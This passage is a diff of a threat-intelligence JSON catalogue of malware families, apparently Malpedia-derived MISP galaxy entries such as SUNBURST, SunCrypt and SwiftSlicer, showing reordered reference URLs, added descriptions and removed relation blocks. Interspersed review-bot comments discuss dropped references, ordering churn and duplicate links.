- "https://community.ibm.com/community/user/security/blogs/gladys-koskas1/2020/12/18/sunburst-indicator-detection-in-qradar",
- "https://go.recordedfuture.com/hubfs/reports/pov-2020-1230.pdf",
- "https://netresec.com/?b=212a6ad",
- "https://www.microsoft.com/en-us/security/business/threat-protection/solorigate-detection-guidance",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a",
- "https://www.fireeye.com/blog/threat-research/2020/12/sunburst-additional-technical-details.html",
- "https://unit42.paloaltonetworks.com/solarstorm-supply-chain-attack-timeline",
- "https://www.brighttalk.com/webcast/7451/469525",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sunburst-supply-chain-attack-solarwinds",
"https://netresec.com/?b=2113a6a",
- "https://us-cert.cisa.gov/sites/default/files/publications/SolarWinds_and_AD-M365_Compromise-Detecting_APT_Activity_from_Known_TTPs.pdf",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-sunburst-sending-data",
- "https://www.domaintools.com/resources/blog/unraveling-network-infrastructure-linked-to-the-solarwinds-hack",
- "https://us-cert.cisa.gov/remediating-apt-compromised-networks",
- "https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html",
- "https://us-cert.cisa.gov/ncas/alerts/aa21-077a",
- "https://vrieshd.medium.com/finding-sunburst-victims-and-targets-by-using-passivedns-osint-68f5704a3cdc",
- "https://www.cisa.gov/supply-chain-compromise",
- "https://www.sans.org/webcasts/contrarian-view-solarwinds-119515",
- "https://us-cert.cisa.gov/ncas/alerts/aa20-352a",
- "https://twitter.com/KimZetter/status/1338305089597964290",
- "https://netresec.com/?b=211cd21",
- "https://github.com/fireeye/Mandiant-Azure-AD-Investigator",
- "https://www.aon.com/cyber-solutions/aon_cyber_labs/cloudy-with-a-chance-of-persistent-email-access/",
- "https://techcommunity.microsoft.com/t5/azure-active-directory-identity/azure-ad-workbook-to-help-you-assess-solorigate-risk/ba-p/2010718",
- "https://youtu.be/SW8kVkwDOrc?t=24706",
- "https://blog.reversinglabs.com/blog/sunburst-the-next-level-of-stealth",
- "https://www.brighttalk.com/webcast/7451/462719",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-sunburst-command-control",
- "https://www.ironnet.com/blog/a-closer-look-at-the-solarwinds/sunburst-malware-dga-or-dns-tunneling",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-134a",
- "https://www.crowdstrike.com/blog/crowdstrike-launches-free-tool-to-identify-and-help-mitigate-risks-in-azure-active-directory/",
- "https://www.sec.gov/ix?doc=/Archives/edgar/data/1739942/000173994221000076/swi-20210507.htm",
- "https://blog.cloudflare.com/solarwinds-orion-compromise-trend-data/",
- "https://www.splunk.com/en_us/blog/security/sunburst-backdoor-detections-in-splunk.html",
- "https://www.bleepingcomputer.com/news/security/the-solarwinds-cyberattack-the-hack-the-victims-and-what-we-know/",
- "https://www.securonix.com/web/wp-content/uploads/2020/12/threat_research_solarwinds_sunburst_eclipser_supply_chain.pdf",
- "https://blog.bushidotoken.net/2022/07/space-invaders-cyber-threats-that-are.html",
- "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware",
- "https://news.sophos.com/en-us/2020/12/14/solarwinds-playbook/",
- "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/",
- "https://us-cert.cisa.gov/ncas/current-activity/2020/12/13/active-exploitation-solarwinds-software",
- "https://www.4hou.com/posts/KzZR",
- "https://www.ironnet.com/blog/solarwinds/sunburst-behavioral-analytics-and-collective-defense-in-action",
- "https://medium.com/mitre-attack/identifying-unc2452-related-techniques-9f7b6c7f3714",
- "https://www.gov.pl/web/diplomacy/statement-on-solar-winds-orion-cyberattacks",
- "https://github.com/cisagov/CHIRP",
- "https://www.zscaler.com/blogs/security-research/hitchhikers-guide-solarwinds-incident-response",
- "https://zengo.com/ungilded-secrets-a-new-paradigm-for-key-security/",
- "https://www.bleepingcomputer.com/news/security/fireeye-microsoft-create-kill-switch-for-solarwinds-backdoor/",
- "https://www.domaintools.com/content/conceptualizing-a-continuum-of-cyber-threat-attribution.pdf",
- "https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/",
- "https://research.checkpoint.com/2021/deep-into-the-sunburst-attack/",
- "https://www.cadosecurity.com/post/responding-to-solarigate",
- "https://www.cyberark.com/resources/threat-research-blog/golden-saml-revisited-the-solorigate-connection",
- "https://www.mfa.gov.lv/en/news/latest-news/67813-latvia-s-statement-following-the-announcement-by-the-united-states-of-actions-to-respond-to-the-russian-federation-s-destabilizing-activities",
- "https://file2.api.drift.com/download/drift-prod-file-uploads/417f%2F417f74ae8ddd24aa7c2b43a23093983f/Supply%20Chain%20Attacks_%20Cyber%20Criminals%20Target%20the%20Weakest%20Link.pdf",
- "https://blog.gigamon.com/2021/07/27/ghosts-on-the-wire-expanding-conceptions-of-network-anomalies/",
- "https://www.fireeye.com/current-threats/sunburst-malware.html",
+ "https://www.splunk.com/en_us/blog/security/smoothing-the-bumps-of-onboarding-threat-indicators-into-splunk-enterprise-security.html",
"https://www.accenture.com/us-en/blogs/cyber-defense/threat-intel-takeaways-solarigate",
- "https://us-cert.cisa.gov/ncas/alerts/aa21-008a",
- "https://www.youtube.com/watch?v=LA-XE5Jy2kU",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://www.justice.gov/opa/pr/department-justice-statement-solarwinds-update",
- "https://mp.weixin.qq.com/s/UqXC1vovKUu97569LkYm2Q",
- "https://www.cyborgsecurity.com/cyborg_labs/threat-hunt-deep-dives-solarwinds-supply-chain-compromise-solorigate-sunburst-backdoor/",
+ "https://www.splunk.com/en_us/blog/security/sunburst-backdoor-detections-in-splunk.html",
+ "https://www.securonix.com/web/wp-content/uploads/2020/12/threat_research_solarwinds_sunburst_eclipser_supply_chain.pdf",
+ "https://research.checkpoint.com/2020/sunburst-teardrop-and-the-netsec-new-normal/",
+ "https://blog.talosintelligence.com/2020/12/solarwinds-supplychain-coverage.html#more",
+ "https://github.com/cisagov/CHIRP",
+ "https://www.nato.int/cps/en/natolive/official_texts_183168.htm?selectedLocale=en",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-attacks-stealthy-attackers-attempted-evade-detection",
+ "https://techcommunity.microsoft.com/t5/azure-active-directory-identity/azure-ad-workbook-to-help-you-assess-solorigate-risk/ba-p/2010718",
+ "https://us-cert.cisa.gov/ncas/alerts/aa21-077a",
+ "https://us-cert.cisa.gov/ncas/current-activity/2020/12/13/active-exploitation-solarwinds-software",
+ "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:MSIL/Solorigate.B!dha",
+ "https://www.mandiant.com/resources/unc2452-merged-into-apt29",
+ "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/",
+ "https://research.checkpoint.com/2021/deep-into-the-sunburst-attack/",
+ "https://mp.weixin.qq.com/s/v-ekPFtVNZG1W7vWjcuVug",
+ "https://www.wired.com/story/hacker-lexicon-what-is-a-supply-chain-attack/",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-352a",
+ "https://www.aon.com/cyber-solutions/aon_cyber_labs/cloudy-with-a-chance-of-persistent-email-access/",
+ "https://www.youtube.com/watch?v=JoMwrkijTZ8",
+ "https://netresec.com/?b=212a6ad",
+ "https://www.youtube.com/watch?v=-Vsgmw2G4Wo",
+ "https://github.com/sophos-cybersecurity/solarwinds-threathunt",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a",
+ "https://blog.truesec.com/2020/12/17/the-solarwinds-orion-sunburst-supply-chain-attack/",
+ "https://twitter.com/0xrb/status/1339199268146442241",
+ "https://www.solarwinds.com/securityadvisory/faq",
+ "https://blog.bushidotoken.net/2022/07/space-invaders-cyber-threats-that-are.html",
+ "https://us-cert.cisa.gov/sites/default/files/publications/SolarWinds_and_AD-M365_Compromise-Detecting_APT_Activity_from_Known_TTPs.pdf",
+ "https://www.microsoft.com/security/blog/2021/02/25/microsoft-open-sources-codeql-queries-used-to-hunt-for-solorigate-activity/",
+ "https://github.com/fireeye/sunburst_countermeasures",
+ "https://www.mimecast.com/blog/important-security-update/",
"https://twitter.com/lordx64/status/1338526166051934213",
- "https://www.youtube.com/watch?v=mbGN1xqy1jY"
+ "https://community.ibm.com/community/user/security/blogs/gladys-koskas1/2020/12/18/sunburst-indicator-detection-in-qradar",
+ "https://www.a12d404.net/ranting/2021/01/17/msbuild-backdoor.html",
+ "https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html",
+ "https://blog.apiiro.com/detect-and-prevent-the-solarwinds-build-time-code-injection-attack",
+ "https://pastebin.com/6EDgCKxd",
+ "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html",
+ "https://www.youtube.com/watch?v=LA-XE5Jy2kU",
+ "https://www.youtube.com/watch?v=cMauHTV-lJg",
+ "https://youtu.be/Ta_vatZ24Cs?t=59",
+ "https://mitre-attack.github.io/attack-navigator/#layerURL=https://raw.githubusercontent.com/center-for-threat-informed-defense/public-resources/master/solorigate/UNC2452.json",
+ "https://www.zscaler.com/blogs/security-research/hitchhikers-guide-solarwinds-incident-response",
+ "https://techcommunity.microsoft.com/t5/azure-sentinel/solarwinds-post-compromise-hunting-with-azure-sentinel/ba-p/1995095",
+ "https://www.cisa.gov/supply-chain-compromise",
+ "https://www.ironnet.com/blog/solarwinds/sunburst-behavioral-analytics-and-collective-defense-in-action",
+ "https://twitter.com/Intel471Inc/status/1339233255741120513",
+ "https://us-cert.cisa.gov/ncas/alerts/aa21-008a",
+ "https://www.elastic.co/blog/supervised-and-unsupervised-machine-learning-for-dga-detection",
+ "https://blog.prevasio.com/2020/12/sunburst-backdoor-deeper-look-into.html",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://www.solarwinds.com/securityadvisory",
+ "https://www.crowdstrike.com/blog/crowdstrike-launches-free-tool-to-identify-and-help-mitigate-risks-in-azure-active-directory/",
+ "https://go.recordedfuture.com/hubfs/reports/pov-2020-1230.pdf",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-unique-dga",
+ "https://www.bleepingcomputer.com/news/security/autodesk-reveals-it-was-targeted-by-russian-solarwinds-hackers/",
+ "https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/",
+ "https://threatconnect.com/blog/tracking-sunburst-related-activity-with-threatconnect-dashboards",
+ "https://twitter.com/FireEye/status/1339295983583244302",
+ "https://twitter.com/cybercdh/status/1339241246024404994",
+ "https://thenewstack.io/behind-the-scenes-of-the-sunburst-attack/",
+ "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware",
+ "https://www.picussecurity.com/resource/blog/ttps-used-in-the-solarwinds-breach",
+ "https://blog.truesec.com/2021/01/07/avoiding-supply-chain-attacks-similar-to-solarwinds-orions-sunburst",
+ "https://unit42.paloaltonetworks.com/atoms/solarphoenix/",
+ "https://securelist.com/sunburst-backdoor-kazuar/99981/",
+ "https://www.domaintools.com/resources/blog/unraveling-network-infrastructure-linked-to-the-solarwinds-hack"
],
"synonyms": [
"Solorigate"
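Review bot: seventeen references leave the Sunburst refs list with no replacement, among them the Volexity Dark Halo write-up, the CyberArk Golden SAML post, the MITRE ATT&CK UNC2452 techniques post, the FireEye sunburst-malware page, the justice.gov and gov.pl statements and the final YouTube link (`mbGN1xqy1jY`), while most of the other removed lines are simply re-added lower down. If Malpedia itself dropped those entries the change is fine, but if the generator now replaces the list instead of merging it, this is a regression; please confirm which it is in the commit message.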
@@ -43714,29 +46086,29 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.suncrypt",
- "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
- "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-april-1st-2022-i-can-fight-with-a-keyboard/",
- "https://medium.com/s2wlab/case-analysis-of-suncrypt-ransomware-negotiation-and-bitcoin-transaction-43a2194ac0bc",
- "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
- "https://medium.com/s2wlab/w4-july-en-story-of-the-week-ransomware-on-the-darkweb-c61965d0386a",
"https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
- "https://medium.com/@sapphirex00/diving-into-the-sun-suncrypt-a-new-neighbour-in-the-ransomware-mafia-d89010c9df83",
- "https://pcsxcetrasupport3.wordpress.com/2021/03/28/suncrypt-powershell-obfuscation-shellcode-and-more-yara/",
- "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound",
- "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion",
- "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
- "https://www.intezer.com/blog/malware-analysis/when-viruses-mutate-did-suncrypt-ransomware-evolve-from-qnapcrypt",
- "https://blog.minerva-labs.com/suncrypt-ransomware-gains-new-abilities-in-2022",
- "https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf",
- "https://www.bleepingcomputer.com/news/security/suncrypt-ransomware-sheds-light-on-the-maze-ransomware-cartel/",
- "https://www.tesorion.nl/en/posts/shining-a-light-on-suncrypts-curious-file-encryption-mechanism/",
- "https://www.bleepingcomputer.com/news/security/suncrypt-ransomware-is-still-alive-and-kicking-in-2022/",
- "https://cdn.pathfactory.com/assets/10555/contents/394789/0dd521f8-aa64-4517-834e-bc852e9ab95d.pdf",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
"https://www.trendmicro.com/en_us/research/22/g/gootkit-loaders-updated-tactics-and-fileless-delivery-of-cobalt-strike.html",
- "https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/",
+ "https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel",
+ "https://www.tesorion.nl/en/posts/shining-a-light-on-suncrypts-curious-file-encryption-mechanism/",
+ "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
"https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer",
- "https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel"
+ "https://medium.com/s2wlab/w4-july-en-story-of-the-week-ransomware-on-the-darkweb-c61965d0386a",
+ "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion",
+ "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound",
+ "https://medium.com/@sapphirex00/diving-into-the-sun-suncrypt-a-new-neighbour-in-the-ransomware-mafia-d89010c9df83",
+ "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
+ "https://www.bleepingcomputer.com/news/security/suncrypt-ransomware-is-still-alive-and-kicking-in-2022/",
+ "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
+ "https://cdn.pathfactory.com/assets/10555/contents/394789/0dd521f8-aa64-4517-834e-bc852e9ab95d.pdf",
+ "https://www.intezer.com/blog/malware-analysis/when-viruses-mutate-did-suncrypt-ransomware-evolve-from-qnapcrypt",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf",
+ "https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/",
+ "https://pcsxcetrasupport3.wordpress.com/2021/03/28/suncrypt-powershell-obfuscation-shellcode-and-more-yara/",
+ "https://www.bleepingcomputer.com/news/security/suncrypt-ransomware-sheds-light-on-the-maze-ransomware-cartel/",
+ "https://medium.com/s2wlab/case-analysis-of-suncrypt-ransomware-negotiation-and-bitcoin-transaction-43a2194ac0bc",
+ "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-april-1st-2022-i-can-fight-with-a-keyboard/",
+ "https://blog.minerva-labs.com/suncrypt-ransomware-gains-new-abilities-in-2022"
],
"synonyms": [],
"type": []
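Review bot: this hunk changes nothing but the order of the SunCrypt refs, which points at the generator emitting refs in set or dictionary iteration order; sorting the list (or preserving upstream order) before writing would confine the diff to real additions and removals. The same pure-reorder churn recurs in most of the hunks below and makes the genuinely dropped or added references hard to spot.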
@@ -43755,15 +46127,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "80365d3a-6d46-4195-a772-364749a6dc06",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "a51b82ba-7e32-4a8e-b5d0-8d0441bdcce4",
"value": "SunOrcal"
},
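Review bot: deleting the `related` block drops SunOrcal's `similar` relation (likelihood `almost-certain`) to cluster `80365d3a-6d46-4195-a772-364749a6dc06`, and the identical deletion recurs below for SunSeed, surtr, Sword, TabMsgSQL, taidoor and Tapaoux. If these relations are now generated from another source, say so in the commit message; otherwise the removals silently break cross-cluster navigation and should be reverted.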
@@ -43778,15 +46141,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "54c03b3c-6f97-46ea-a93f-f07bfd5cdd36",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "a89f7e01-b049-4d09-aca3-ce19d91c4544",
"value": "SunSeed"
},
@@ -43795,29 +46149,29 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.supernova",
- "https://www.secureworks.com/blog/supernova-web-shell-deployment-linked-to-spiral-threat-group",
"https://www.youtube.com/watch?v=7WX5fCEzTlA",
- "https://unit42.paloaltonetworks.com/solarstorm-supernova",
- "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html",
"https://twitter.com/MalwareRE/status/1342888881373503488",
- "https://unit42.paloaltonetworks.com/solarstorm-supernova/",
- "https://www.splunk.com/en_us/blog/security/detecting-supernova-malware-solarwinds-continued.html",
- "https://github.com/fireeye/sunburst_countermeasures",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a",
- "https://www.solarwinds.com/securityadvisory",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-027a",
- "https://www.splunk.com/en_us/blog/security/supernova-redux-with-a-generous-portion-of-masquerading.html",
- "https://www.anquanke.com/post/id/226029",
- "https://www.guidepointsecurity.com/blog/supernova-solarwinds-net-webshell-analysis",
- "https://www.guidepointsecurity.com/supernova-solarwinds-net-webshell-analysis/",
- "https://www.solarwinds.com/securityadvisory/faq",
- "https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/",
- "https://www.sentinelone.com/labs/solarwinds-understanding-detecting-the-supernova-webshell-trojan",
- "https://us-cert.cisa.gov/ncas/alerts/aa21-008a",
- "https://www.trendmicro.com/en_us/research/20/l/overview-of-recent-sunburst-targeted-attacks.html",
"https://github.com/fireeye/sunburst_countermeasures/pull/5",
+ "https://www.solarwinds.com/securityadvisory/faq",
+ "https://github.com/fireeye/sunburst_countermeasures",
+ "https://www.guidepointsecurity.com/blog/supernova-solarwinds-net-webshell-analysis",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a",
+ "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html",
+ "https://labs.sentinelone.com/solarwinds-understanding-detecting-the-supernova-webshell-trojan/",
+ "https://www.guidepointsecurity.com/supernova-solarwinds-net-webshell-analysis/",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-027a",
+ "https://unit42.paloaltonetworks.com/solarstorm-supernova",
+ "https://www.splunk.com/en_us/blog/security/detecting-supernova-malware-solarwinds-continued.html",
+ "https://www.splunk.com/en_us/blog/security/supernova-redux-with-a-generous-portion-of-masquerading.html",
+ "https://www.secureworks.com/blog/supernova-web-shell-deployment-linked-to-spiral-threat-group",
+ "https://us-cert.cisa.gov/ncas/alerts/aa21-008a",
+ "https://unit42.paloaltonetworks.com/solarstorm-supernova/",
+ "https://www.trendmicro.com/en_us/research/20/l/overview-of-recent-sunburst-targeted-attacks.html",
"https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://labs.sentinelone.com/solarwinds-understanding-detecting-the-supernova-webshell-trojan/"
+ "https://www.sentinelone.com/labs/solarwinds-understanding-detecting-the-supernova-webshell-trojan",
+ "https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/",
+ "https://www.anquanke.com/post/id/226029",
+ "https://www.solarwinds.com/securityadvisory"
],
"synonyms": [],
"type": []
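Review bot: the Supernova list keeps near-duplicate references that differ only by a trailing slash or a host rename, for example `https://unit42.paloaltonetworks.com/solarstorm-supernova` next to `https://unit42.paloaltonetworks.com/solarstorm-supernova/`, `https://www.guidepointsecurity.com/blog/supernova-solarwinds-net-webshell-analysis` next to `https://www.guidepointsecurity.com/supernova-solarwinds-net-webshell-analysis/`, and the two SentinelOne URLs. Normalising URLs (strip the trailing slash) before de-duplicating would remove these; the same trailing-slash pair (the Microsoft ransomware-as-a-service post) survives in the SystemBC hunk further down.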
@@ -43830,11 +46184,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.suppobox",
- "https://media.blackhat.com/us-13/US-13-Geffner-End-To-End-Analysis-of-a-Domain-Generating-Algorithm-Malware-Family-WP.pdf",
- "https://www.justice.gov/opa/pr/two-romanian-cybercriminals-convicted-all-21-counts-relating-infecting-over-400000-victim",
"https://www.symantec.com/connect/blogs/trojanbayrob-strikes-again-1",
+ "https://www.justice.gov/opa/pr/two-romanian-cybercriminals-convicted-all-21-counts-relating-infecting-over-400000-victim",
"https://www.symantec.com/connect/blogs/bayrob-three-suspects-extradited-face-charges-us",
- "https://paper.bobylive.com/Meeting_Papers/BlackHat/USA-2013/US-13-Geffner-End-To-End-Analysis-of-a-Domain-Generating-Algorithm-Malware-Family-WP.pdf"
+ "https://paper.bobylive.com/Meeting_Papers/BlackHat/USA-2013/US-13-Geffner-End-To-End-Analysis-of-a-Domain-Generating-Algorithm-Malware-Family-WP.pdf",
+ "https://media.blackhat.com/us-13/US-13-Geffner-End-To-End-Analysis-of-a-Domain-Generating-Algorithm-Malware-Family-WP.pdf"
],
"synonyms": [
"Bayrob",
@@ -43855,15 +46209,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "dd919e75-57e8-4e5c-9451-8be6e734f1f3",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "8666afcc-8cc2-4856-83de-b7e8b4309367",
"value": "surtr"
},
@@ -43872,8 +46217,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.svcready",
- "https://www.socinvestigation.com/new-svcready-malware-loads-from-word-doc-properties-detection-response/",
- "https://threatresearch.ext.hp.com/svcready-a-new-loader-reveals-itself/"
+ "https://threatresearch.ext.hp.com/svcready-a-new-loader-reveals-itself/",
+ "https://www.socinvestigation.com/new-svcready-malware-loads-from-word-doc-properties-detection-response/"
],
"synonyms": [],
"type": []
@@ -43894,6 +46239,23 @@
"uuid": "63657a3b-1f8f-422d-80de-fe4644f5d7ba",
"value": "swen"
},
+ {
+ "description": "According to ESET, this is a wiper written in Go, that was deployed against an Ukrainian organization on January 25th 2023 through Group Policy, which suggests that the attackers had taken control of the victim’s Active Directory environment.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.swiftslicer",
+ "https://www.welivesecurity.com/2023/01/27/swiftslicer-new-destructive-wiper-malware-ukraine/",
+ "https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf",
+ "https://twitter.com/ESETresearch/status/1618960022150729728"
+ ],
+ "synonyms": [
+ "JaguarBlade"
+ ],
+ "type": []
+ },
+ "uuid": "dba43d45-053f-4225-b813-ff7727b2b7d2",
+ "value": "SwiftSlicer"
+ },
{
"description": "",
"meta": {
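Review bot: the new SwiftSlicer description reads "deployed against an Ukrainian organization"; it should be "a Ukrainian organization", and the curly apostrophe in "victim’s" is worth replacing with a plain ASCII one for consistency with the other descriptions in this file.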
@@ -43904,15 +46266,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "96fb29fa-7c3a-4124-baf5-cc5f99b2a05f",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "2112870f-06f1-44a9-9c43-6cc4fb90e295",
"value": "Sword"
},
@@ -43921,13 +46274,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.sykipot",
+ "https://www.symantec.com/connect/blogs/sykipot-attacks",
"https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
"https://documents.trendmicro.com/assets/wp/wp-detecting-apt-activity-with-network-traffic-analysis.pdf",
+ "https://www.secureworks.com/research/threat-profiles/bronze-edison",
"https://www.alienvault.com/blogs/labs-research/sykipot-is-back",
"https://community.rsa.com/thread/185437",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/sykipot-now-targeting-us-civil-aviation-sector-information/",
- "https://www.secureworks.com/research/threat-profiles/bronze-edison",
- "https://www.symantec.com/connect/blogs/sykipot-attacks"
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/sykipot-now-targeting-us-civil-aviation-sector-information/"
],
"synonyms": [
"Wkysol",
@@ -43943,8 +46296,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.synack",
- "https://therecord.media/synack-ransomware-gang-releases-decryption-keys-for-old-victims/",
- "https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/"
+ "https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/",
+ "https://therecord.media/synack-ransomware-gang-releases-decryption-keys-for-old-victims/"
],
"synonyms": [],
"type": []
@@ -43995,9 +46348,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.sys10",
+ "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/TheNaikonAPT-MsnMM1.pdf",
"https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf",
- "https://securelist.com/analysis/publications/69953/the-naikon-apt/",
- "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/TheNaikonAPT-MsnMM1.pdf"
+ "https://securelist.com/analysis/publications/69953/the-naikon-apt/"
],
"synonyms": [],
"type": []
@@ -44010,9 +46363,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.syscon",
+ "http://blog.trendmicro.com/trendlabs-security-intelligence/syscon-backdoor-uses-ftp-as-a-cc-channel/",
"https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/",
- "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
- "http://blog.trendmicro.com/trendlabs-security-intelligence/syscon-backdoor-uses-ftp-as-a-cc-channel/"
+ "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/"
],
"synonyms": [],
"type": []
@@ -44035,13 +46388,13 @@
"value": "SysGet"
},
{
- "description": "",
+ "description": "Sysjoker is a backdoor malware that was first discovered in December 2021 by Intezer. It is sophisticated and written from scratch in C++. Sysjoker is a cross-platform malware that has Linux, Windows, and macOS variants. Possible attack vectors for Sysjoker are email attachments, malicious advertisements, and trojanized software.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.sysjoker",
+ "https://blogs.vmware.com/security/2022/03/%e2%80%afsysjoker-an-analysis-of-a-multi-os-rat.html",
"https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/",
- "https://www.bleepingcomputer.com/news/security/new-sysjoker-backdoor-targets-windows-macos-and-linux/",
- "https://blogs.vmware.com/security/2022/03/%e2%80%afsysjoker-an-analysis-of-a-multi-os-rat.html"
+ "https://www.bleepingcomputer.com/news/security/new-sysjoker-backdoor-targets-windows-macos-and-linux/"
],
"synonyms": [],
"type": []
@@ -44055,8 +46408,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.syskit",
"https://twitter.com/QW5kcmV3/status/1176861114535165952",
- "https://www.darkreading.com/threat-intelligence/iranian-government-hackers-target-us-veterans/d/d-id/1335897",
